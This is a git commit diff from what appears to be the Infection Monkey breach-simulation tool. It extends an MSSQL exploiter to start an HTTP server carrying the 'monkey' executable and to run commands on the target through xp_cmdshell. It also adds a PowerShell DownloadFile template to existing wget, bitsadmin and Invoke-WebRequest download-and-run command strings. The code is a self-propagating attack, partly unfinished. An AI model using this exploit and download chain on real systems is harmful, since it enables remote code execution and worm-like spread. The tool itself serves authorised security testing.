Payload creation
This commit is contained in:
parent
75f26f921e
commit
d2b5e314c1
|
@ -3,8 +3,12 @@ import logging
|
||||||
|
|
||||||
import pymssql
|
import pymssql
|
||||||
|
|
||||||
from infection_monkey.exploit import HostExploiter, mssqlexec_utils
|
from infection_monkey.exploit import HostExploiter, mssqlexec_utils, tools
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
|
from infection_monkey.exploit.tools import HTTPTools
|
||||||
|
from infection_monkey.config import WormConfiguration
|
||||||
|
from infection_monkey.model import RDP_CMDLINE_HTTP
|
||||||
|
|
||||||
|
|
||||||
__author__ = 'Maor Rayzin'
|
__author__ = 'Maor Rayzin'
|
||||||
|
|
||||||
|
@ -73,6 +77,31 @@ class MSSQLExploiter(HostExploiter):
|
||||||
|
|
||||||
chosen_attack = self.attacks_list[0](payload, cursor, self.host)
|
chosen_attack = self.attacks_list[0](payload, cursor, self.host)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Get monkey exe for host and it's path
|
||||||
|
src_path = tools.get_target_monkey(self.host)
|
||||||
|
if not src_path:
|
||||||
|
LOG.info("Can't find suitable monkey executable for host %r", self.host)
|
||||||
|
return False
|
||||||
|
# Create server for http download and wait for it's startup.
|
||||||
|
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
|
||||||
|
if not http_path:
|
||||||
|
LOG.debug("Exploiter failed, http transfer creation failed.")
|
||||||
|
return False
|
||||||
|
# TODO choose bit version
|
||||||
|
dst_path = WormConfiguration.dropper_target_path_win_64
|
||||||
|
dst_path = "c:\\windows\\temp\\monkey64.exe"
|
||||||
|
|
||||||
|
command = RDP_CMDLINE_HTTP % {'http_path': http_path, 'monkey_path': dst_path}
|
||||||
|
LOG.info("Started http server on %s", http_path)
|
||||||
|
tmp_file_path = "c:\\windows\\temp\\monkey_tmp.bat"
|
||||||
|
commands = [r"xp_cmdshell 'echo powershell (new-object System.Net.WebClient).DownloadFile(\" > %s'" % tmp_file_path]
|
||||||
|
commands2 = [r"xp_cmdshell 'echo powershell >> c:\\windows\\temp\\temp.bat'"]
|
||||||
|
chosen_attack.execute_command(commands2)
|
||||||
|
|
||||||
|
|
||||||
if chosen_attack.send_payload():
|
if chosen_attack.send_payload():
|
||||||
LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
|
LOG.debug('Payload: {0} has been successfully sent to host'.format(payload))
|
||||||
if chosen_attack.execute_payload():
|
if chosen_attack.execute_payload():
|
||||||
|
|
|
@ -5,6 +5,7 @@ import logging
|
||||||
import pymssql
|
import pymssql
|
||||||
|
|
||||||
from infection_monkey.exploit.tools import get_interface_to_target
|
from infection_monkey.exploit.tools import get_interface_to_target
|
||||||
|
from infection_monkey.network.info import get_free_tcp_port
|
||||||
from pyftpdlib.authorizers import DummyAuthorizer
|
from pyftpdlib.authorizers import DummyAuthorizer
|
||||||
from pyftpdlib.handlers import FTPHandler
|
from pyftpdlib.handlers import FTPHandler
|
||||||
from pyftpdlib.servers import FTPServer
|
from pyftpdlib.servers import FTPServer
|
||||||
|
@ -21,6 +22,8 @@ FTP_SERVER_PASSWORD = 'force'
|
||||||
FTP_WORK_DIR_WINDOWS = os.path.expandvars(r'%TEMP%/')
|
FTP_WORK_DIR_WINDOWS = os.path.expandvars(r'%TEMP%/')
|
||||||
FTP_WORK_DIR_LINUX = '/tmp/'
|
FTP_WORK_DIR_LINUX = '/tmp/'
|
||||||
|
|
||||||
|
UPLOAD_COMMANDS = []
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
@ -54,7 +57,7 @@ class FTP(object):
|
||||||
handler = FTPHandler
|
handler = FTPHandler
|
||||||
handler.authorizer = authorizer
|
handler.authorizer = authorizer
|
||||||
|
|
||||||
address = (get_interface_to_target(self.dst_ip), FTP_SERVER_PORT)
|
address = (get_interface_to_target(self.dst_ip), get_free_tcp_port())
|
||||||
|
|
||||||
# Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
|
# Configuring the server using the address and handler. Global usage in stop_server thats why using self keyword
|
||||||
self.server = FTPServer(address, handler)
|
self.server = FTPServer(address, handler)
|
||||||
|
@ -103,6 +106,29 @@ class CmdShellAttack(AttackHost):
|
||||||
self.ftp_server, self.ftp_server_p = self.__init_ftp_server(host)
|
self.ftp_server, self.ftp_server_p = self.__init_ftp_server(host)
|
||||||
self.cursor = cursor
|
self.cursor = cursor
|
||||||
self.attacker_ip = get_interface_to_target(host.ip_addr)
|
self.attacker_ip = get_interface_to_target(host.ip_addr)
|
||||||
|
self.host = host
|
||||||
|
|
||||||
|
def execute_command(self, cmds):
|
||||||
|
ftp_server, ftp_server_p = self.__init_ftp_server(self.host)
|
||||||
|
if ftp_server_p and ftp_server:
|
||||||
|
#command = "xp_cmdshell \""+cmd+"\""
|
||||||
|
#command = "xp_cmdshell \"C:\\download.bat\""
|
||||||
|
#command = "EXEC xp_cmdshell \"c:\\download.bat\""
|
||||||
|
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Running the cmd on remote host
|
||||||
|
for cmd in cmds:
|
||||||
|
self.cursor.execute(cmd)
|
||||||
|
sleep(0.5)
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
|
||||||
|
self.ftp_server_p.terminate()
|
||||||
|
return False
|
||||||
|
return True
|
||||||
|
else:
|
||||||
|
LOG.error("Couldn't establish an FTP server for the dropout")
|
||||||
|
return False
|
||||||
|
|
||||||
def send_payload(self):
|
def send_payload(self):
|
||||||
"""
|
"""
|
||||||
|
|
|
@ -18,6 +18,7 @@ DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del
|
||||||
|
|
||||||
# Commands used for downloading monkeys
|
# Commands used for downloading monkeys
|
||||||
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
|
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
|
||||||
|
POWERSHELL_UPLOAD_SHORT = "powershell (new-object System.Net.WebClient).DownloadFile('%(http_path)s','%(monkey_path)s')"
|
||||||
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
|
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
|
||||||
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||||
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
||||||
|
|
File diff suppressed because it is too large
Load Diff
Loading…
Reference in New Issue